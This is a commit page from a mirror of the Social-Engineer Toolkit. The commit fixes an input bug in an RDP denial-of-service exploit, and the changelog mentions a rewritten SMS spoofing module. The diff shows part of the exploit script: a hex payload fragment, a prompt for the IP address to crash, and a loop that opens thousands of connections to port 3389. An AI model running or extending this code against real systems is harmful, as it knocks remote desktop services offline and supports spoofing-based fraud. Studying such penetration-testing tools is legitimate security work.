mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2025-03-03 06:47:31 +00:00
fix string error in rdpdos exploit
This commit is contained in:
parent
f9d3f75872
commit
6840b5c253
2 changed files with 2 additions and 1 deletions
|
@ -4,6 +4,7 @@ version 7.3
|
|||
|
||||
* completely rewrote the SMS spoofing module from scratch to use spoofmytextmessage.com which the folks over there are super helpful and provided an undocumented API to be used within SET. This now works great and has been extensively tested.
|
||||
* sped up the load process when using the main menu system the loading would pull from github each time the show_banner() function was called - this only loads once per SET load now
|
||||
* fixed a string integer error from input to raw_input in the RDP DOS use after free in exploits
|
||||
|
||||
~~~~~~~~~~~~~~~~
|
||||
version 7.2.3
|
||||
|
|
|
@ -24,7 +24,7 @@ dafree = "0300000802f08028".decode('hex')
|
|||
trololo = headpack + dafuq + dafree
|
||||
|
||||
#HOSTNYO = sys.argv[1]
|
||||
HOSTNYO = input("Enter the IP address to crash (remote desktop): ")
|
||||
HOSTNYO = raw_input("Enter the IP address to crash (remote desktop): ")
|
||||
PORTNYO = 3389
|
||||
for i in range(10240):
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
|
|
Loading…
Add table
Reference in a new issue